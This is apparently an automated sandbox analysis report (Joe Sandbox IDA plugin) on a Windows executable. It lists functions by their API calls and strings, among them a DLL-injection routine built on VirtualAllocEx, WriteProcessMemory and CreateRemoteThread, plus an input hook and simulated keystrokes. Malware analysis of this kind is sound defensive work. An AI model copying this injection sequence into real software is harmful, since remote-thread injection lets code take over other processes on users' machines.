Crea, xrefs: 003E9169
odul, xrefs: 003E922D
catA, xrefs: 003E91AF
Clos, xrefs: 003E9129
lstr, xrefs: 003E91A7
WinE, xrefs: 003E9110
hjErac.exe, xrefs: 003E91FD, 003E9200
Writ, xrefs: 003E9148
GetM, xrefs: 003E90B6
.dll, xrefs: 003E9102
el32, xrefs: 003E90FB
GetT, xrefs: 003E9188
dleA, xrefs: 003E90D0

Memory Dump Source

Source File: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$hjErac.exe$lstr$odul
API String ID: 3741012433-2124918586
Opcode ID: 48a8c15285c83da8d9ea3a694ba2f85e4c028d6248d40bd10a5b8121fe4c6e81
Instruction ID: d6bd394da23225bb094fe3eea5441eea77fddf70166f99c629f797d5a33b31f1
Opcode Fuzzy Hash: 48a8c15285c83da8d9ea3a694ba2f85e4c028d6248d40bd10a5b8121fe4c6e81
Instruction Fuzzy Hash: 83613C74D0026ADBCF26CF96C848BADB7B5BF44311F1682ABD505AB681D3709E81CB91

Function 003E2510 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 262
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32(027C55B8), ref: 003E2547
GetWindowThreadProcessId.USER32(00000000,?), ref: 003E2563
CreateThread.KERNELBASE(00000000,00000000,003E2640,00000000,00000000,00000000), ref: 003E260F
CloseHandle.KERNEL32(00000000), ref: 003E261A
Sleep.KERNELBASE(000003E8), ref: 003E2628
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(list too long), ref: 003E2638
OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,00000000,?), ref: 003E2678

Strings

Filter %s found!, xrefs: 003E27EB
devenv, xrefs: 003E26C9
list too long, xrefs: 003E2633

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ProcessThreadWindow$CloseCreateForegroundHandleOpenSleepXlength_error@std@@
String ID: Filter %s found!$devenv$list too long
API String ID: 219287018-55259838
Opcode ID: ba73e2daf9ad4a78120823e9701d08d94fd8bf4e9d4cf4bd77ae57fdc3630c4b
Instruction ID: a39b9c11646997021788064566e07884146dff693717034458eae96accd97a4d
Opcode Fuzzy Hash: ba73e2daf9ad4a78120823e9701d08d94fd8bf4e9d4cf4bd77ae57fdc3630c4b
Instruction Fuzzy Hash: 31A16271A002A9DFDB21DF56DC85BDAB7B8FF48710F0042A9E9499B291D7B09D84CB90

Function 003E2130 Relevance: 19.6, APIs: 13, Instructions: 114
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 003E2159
WSAGetLastError.WS2_32 ref: 003E2163
socket.WS2_32(00000002,00000002,00000011), ref: 003E2189
WSAGetLastError.WS2_32 ref: 003E2197

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ErrorLast$Startupsocket
String ID:
API String ID: 2817534722-0
Opcode ID: b0112a445aabfad8f52a9d7b75108aeffcc13ae1a80de4a8eec909f3fb8ad1ba
Instruction ID: 99a3296a01ebbdbfacdc93fe14af3442b71490a6e1f1b1d1ba987ce8d29459fe
Opcode Fuzzy Hash: b0112a445aabfad8f52a9d7b75108aeffcc13ae1a80de4a8eec909f3fb8ad1ba
Instruction Fuzzy Hash: 7541A1716007509BD7319F65DC4AF57BBE8FF5D720F100B19F6968A2E0D770A8848B61

Function 003E1B20 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 167
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003E1B90
GetLastError.KERNEL32 ref: 003E1BA3
GetLastError.KERNEL32 ref: 003E1BAD
_printf.MSPDB140-MSVCRT ref: 003E1BB5

Part of subcall function 003E2040: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,003E1BF7,ERRNO %lu,00000000), ref: 003E2049
Part of subcall function 003E2040: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?,00000000), ref: 003E2064

GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 003E1BD5
GetLastError.KERNEL32 ref: 003E1BE4
GetLastError.KERNEL32 ref: 003E1BEA
_printf.MSPDB140-MSVCRT ref: 003E1BF2
memset.VCRUNTIME140(00000000,00000000,00000068,00000068,00000400,00000014), ref: 003E1C64
GetCurrentProcessId.KERNEL32 ref: 003E1C72
CreateThread.KERNELBASE(00000000,00000000,Function_00002510,00000001,00000000,00000000), ref: 003E1D0A

Strings

ERRNO %lu, xrefs: 003E1BB0, 003E1BED
Z:\usr\bin\di.dll, xrefs: 003E1C1B, 003E1C40
xinput1_3, xrefs: 003E1D27
LoadLibraryA, xrefs: 003E1BCF
kernel32.dll, xrefs: 003E1B8B

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ErrorLast$_printf$AddressCreateCurrentHandleModuleProcProcessThread__acrt_iob_func__stdio_common_vfprintfmallocmemset
String ID: ERRNO %lu$LoadLibraryA$Z:\usr\bin\di.dll$kernel32.dll$xinput1_3
API String ID: 2494052705-1576103940
Opcode ID: b1d053c47c12f98793ee080659fd857fe8a61c8051826dd120b9719b594ef11b
Instruction ID: 6b2b2d27355b2c0ffed9bba69d49c443948143d7f97ce08d2a9b52a46db90282
Opcode Fuzzy Hash: b1d053c47c12f98793ee080659fd857fe8a61c8051826dd120b9719b594ef11b
Instruction Fuzzy Hash: 53617BB09003949FDB21DF55D849B9ABBF4FB08314F108669E914AF3D1D7B69904CB90

Function 003E1459 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 58
windowsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(0000000E), ref: 003E145B
GetLastError.KERNEL32 ref: 003E146A
MessageBoxA.USER32(00000000,UNSUPPORTED WINE!!!,Please contact with developer, to add support.,00000000), ref: 003E147E
PostQuitMessage.USER32(-00000001), ref: 003E148E
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 003E1496
GetLastError.KERNEL32 ref: 003E149C
PeekMessageA.USER32(003E6520,00000000,00000000,00000000,00000001), ref: 003E14D4
TranslateMessage.USER32(003E6520), ref: 003E14DF
DispatchMessageA.USER32(003E6520), ref: 003E14E6
SetCursorPos.USER32 ref: 003E1506
Sleep.KERNELBASE(00000003), ref: 003E150E
UnhookWindowsHookEx.USER32 ref: 003E1523

Strings

UNSUPPORTED WINE!!!, xrefs: 003E1477
Please contact with developer, to add support., xrefs: 003E1472

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: Message$ErrorHookLastWindows$CursorDispatchPeekPostQuitSleepTranslateUnhookexit
String ID: Please contact with developer, to add support.$UNSUPPORTED WINE!!!
API String ID: 462765712-1537259461
Opcode ID: ad35e484b9b646301ddf56127c900be342d8b0603697fbb4fdbc4c0a54e0b777
Instruction ID: eb78d9c7095b07bdb4bfe9d09317ae8eafdbff203d9ddb1534c696f468b9f618
Opcode Fuzzy Hash: ad35e484b9b646301ddf56127c900be342d8b0603697fbb4fdbc4c0a54e0b777
Instruction Fuzzy Hash: 3D116A327403E0ABE7331BA7AC8AB54BF7CA76A751F050360F302991E0C6B15940CF25

Function 003E1530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26

_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1610,00000000,00000000,00000004,00000004,027C55B8), ref: 003E157F
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E159F
_Thrd_detach.MSVCP140(00000000,?), ref: 003E15A7
?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E15B5
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000006), ref: 003E15C4

Strings

jjh, xrefs: 003E1562

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: Throw_$Cpp_error@std@@$C_error@std@@Thrd_detach_beginthreadexmalloc
String ID: jjh
API String ID: 2396835676-1719336355
Opcode ID: 8c998487302892d7676a35f2a02c0d314cb751fbd08c27a6d1ebf50026330dc4
Instruction ID: b96c19100669bca68ad7a18bdc8072cf972b3f5c1c0b6502e5f4be112744f1f8
Opcode Fuzzy Hash: 8c998487302892d7676a35f2a02c0d314cb751fbd08c27a6d1ebf50026330dc4
Instruction Fuzzy Hash: A41146709402959FDB119F95DD4ABAEB7BCEB08705F000229F9069B2C1EB7559048B54

Function 003E1160 Relevance: 7.6, APIs: 5, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26

_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1280,00000000,00000000,00000000), ref: 003E11E9
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E1209
_Thrd_detach.MSVCP140(00000000,?), ref: 003E1211
?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E121F
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000006), ref: 003E124A

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: Throw_$Cpp_error@std@@$C_error@std@@Thrd_detach_beginthreadexmalloc
String ID:
API String ID: 2396835676-0
Opcode ID: eedc77d8153f13d23239c8f6b2e15080f440ef1f28d3c447f0645fff86d6a9e5
Instruction ID: 251d506a527e36ec43d37456cf2d7cdb410ed5e7695e05550ff4aef8dd1710b9
Opcode Fuzzy Hash: eedc77d8153f13d23239c8f6b2e15080f440ef1f28d3c447f0645fff86d6a9e5
Instruction Fuzzy Hash: E63162B09403549FEB219F65CD49BABBBF8EB04714F00461DE515DB2C0EBB5A904CB90

Function 003E2000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 10
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000000,Local\$InputBridge$,003E1DEA,027C55B8,?,?,?,?,003E38C3,000000FF), ref: 003E2009
GetLastError.KERNEL32(?,?,?,?,003E38C3,000000FF), ref: 003E200F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF,?,?,?,?,003E38C3,000000FF), ref: 003E201E

Strings

Local\$InputBridge$, xrefs: 003E2000

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: CreateErrorLastMutexexit
String ID: Local\$InputBridge$
API String ID: 1207567285-3219089667
Opcode ID: 03e50db5a9244d77d45161b4ce8d9c073e91345d5272bba307e76066f56c086f
Instruction ID: a2fa3f0e382c982aac06575273ba4fd6668040155c747ee54391be1f8cfde55a
Opcode Fuzzy Hash: 03e50db5a9244d77d45161b4ce8d9c073e91345d5272bba307e76066f56c086f
Instruction Fuzzy Hash: 4BC04C315542D1D7DE732752ED8DB097A29A758736F250B20F33AE81E1CB604C808515

Function 003E1050 Relevance: 3.1, APIs: 2, Instructions: 70
sleepkeyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendInput.USER32(00000001,003E64FC,0000001C), ref: 003E1130
Sleep.KERNELBASE(000003E8), ref: 003E1141

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: InputSendSleep
String ID:
API String ID: 221531666-0
Opcode ID: ab5c5bf0a953a58c479329d5d8b543cb547390a36761abf90b676b96a74f8c78
Instruction ID: fee88cb6ed77754c6919bfca0dcd70650e792806dd95aa6661364bee09ee0bce
Opcode Fuzzy Hash: ab5c5bf0a953a58c479329d5d8b543cb547390a36761abf90b676b96a74f8c78
Instruction Fuzzy Hash: 2321B1309047948FE726CF27D441722BBE2AF6A744F198B5DE4456A1E2D771A8C48B50

Function 003E1DC0 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E2000: CreateMutexA.KERNELBASE(00000000,00000000,Local\$InputBridge$,003E1DEA,027C55B8,?,?,?,?,003E38C3,000000FF), ref: 003E2009
Part of subcall function 003E2000: GetLastError.KERNEL32(?,?,?,?,003E38C3,000000FF), ref: 003E200F
Part of subcall function 003E2000: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF,?,?,?,?,003E38C3,000000FF), ref: 003E201E

Part of subcall function 003E1B20: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003E1B90
Part of subcall function 003E1B20: GetLastError.KERNEL32 ref: 003E1BA3
Part of subcall function 003E1B20: GetLastError.KERNEL32 ref: 003E1BAD
Part of subcall function 003E1B20: _printf.MSPDB140-MSVCRT ref: 003E1BB5

Part of subcall function 003E1530: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1610,00000000,00000000,00000004,00000004,027C55B8), ref: 003E157F
Part of subcall function 003E1530: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E159F
Part of subcall function 003E1530: _Thrd_detach.MSVCP140(00000000,?), ref: 003E15A7
Part of subcall function 003E1530: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E15B5
Part of subcall function 003E1530: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000006), ref: 003E15C4

KiUserCallbackDispatcher.NTDLL(00000000), ref: 003E1DFC
GetSystemMetrics.USER32(00000001), ref: 003E1E05

Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26

Part of subcall function 003E1160: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1280,00000000,00000000,00000000), ref: 003E11E9
Part of subcall function 003E1160: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E1209
Part of subcall function 003E1160: _Thrd_detach.MSVCP140(00000000,?), ref: 003E1211
Part of subcall function 003E1160: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E121F

Part of subcall function 003E2A11: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A19
Part of subcall function 003E2A11: _CxxThrowException.VCRUNTIME140(?,003E4BFC), ref: 003E2E1D
Part of subcall function 003E2A11: _CxxThrowException.VCRUNTIME140(?,003E4C7C), ref: 003E2E3A

Part of subcall function 003E1EA0: memset.VCRUNTIME140(00000000,00000000,0000002C,003E1E7E,0000002C), ref: 003E1EA5

Part of subcall function 003E2080: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,0000000C,00000000), ref: 003E20CD

Part of subcall function 003E2100: Sleep.KERNEL32(000003E8,00000000,00000000,?,?,003E1E9B), ref: 003E211E

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: Throw_$Cpp_error@std@@ErrorLast$C_error@std@@ExceptionThrd_detachThrow_beginthreadexmalloc$CallbackCreateDispatcherHandleMetricsModuleMutexSleepSystemUser_callnewh_printfexitmemset
String ID:
API String ID: 1912642095-0
Opcode ID: 0e32b6c660e0ea9d994dc165807470563923bf5b1204810bfb0759e3668f90bf
Instruction ID: c5bb497e03dc37ad9f718cd7f0438dc30076a24351827b30e1b4eb24c266e006
Opcode Fuzzy Hash: 0e32b6c660e0ea9d994dc165807470563923bf5b1204810bfb0759e3668f90bf
Instruction Fuzzy Hash: 3911A270D002A59BD762EFB6CC46B5F7AADEB40750F004729F1159F2D1EBB45E018B90

Function 003E2100 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E2130: WSAStartup.WS2_32(00000202,?), ref: 003E2159
Part of subcall function 003E2130: WSAGetLastError.WS2_32 ref: 003E2163

Sleep.KERNEL32(000003E8,00000000,00000000,?,?,003E1E9B), ref: 003E211E

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ErrorLastSleepStartup
String ID:
API String ID: 608709709-0
Opcode ID: 71f7d8acedf752099ebd1dcdc1fe946ce1d2ab0863972fa3cc2aea988390dcff
Instruction ID: 346fe67c2d0347a36ad2f86b576fad4cfe10a9c0abfdb28984a8f74c8ab5db8e
Opcode Fuzzy Hash: 71f7d8acedf752099ebd1dcdc1fe946ce1d2ab0863972fa3cc2aea988390dcff
Instruction Fuzzy Hash: 7FC080255501B46741031347AC43D3FF25F57D9710F0503197700172D049E03D001AE1

Non-executed Functions

Function 003E22C0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105
injectionmemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 003E22F0
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 003E230C
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 003E2328
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 003E2341
GetLastError.KERNEL32 ref: 003E2356
GetLastError.KERNEL32 ref: 003E235C
_printf.MSPDB140-MSVCRT ref: 003E2364
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003E238B
CloseHandle.KERNEL32(?), ref: 003E23AC

Strings

ERRNO %lu, xrefs: 003E235F
@Rt, xrefs: 003E2328
DLL Injected successfully with path %s and length %i, xrefs: 003E239A

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ErrorLastProcess$AllocCloseCreateHandleMemoryObjectOpenRemoteSingleThreadVirtualWaitWrite_printf
String ID: @Rt$DLL Injected successfully with path %s and length %i$ERRNO %lu
API String ID: 736780516-709908767
Opcode ID: 36066e4eaa921415e6a23713b234a9bdef27efcbe43e981f3369ea949d5e09c4
Instruction ID: a9958de52ff7cbac17c42f31ebe0d93dbf56087e94d353774d6911424fadbc65
Opcode Fuzzy Hash: 36066e4eaa921415e6a23713b234a9bdef27efcbe43e981f3369ea949d5e09c4
Instruction Fuzzy Hash: C031F43A600254AFDB269F46DC41F2A7BA9FF89720F158268FA089F2D1D771DC118B60

Function 003E31A6 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003E31B2
memset.VCRUNTIME140(?,00000000,00000003), ref: 003E31D8
memset.VCRUNTIME140(?,00000000,00000050), ref: 003E3262
IsDebuggerPresent.KERNEL32 ref: 003E327E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E329E
UnhandledExceptionFilter.KERNEL32(?), ref: 003E32A8

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: d58ed1054bcb28fccb2b0829b4d1291259a043aa1f8010e933985be3cfa49286
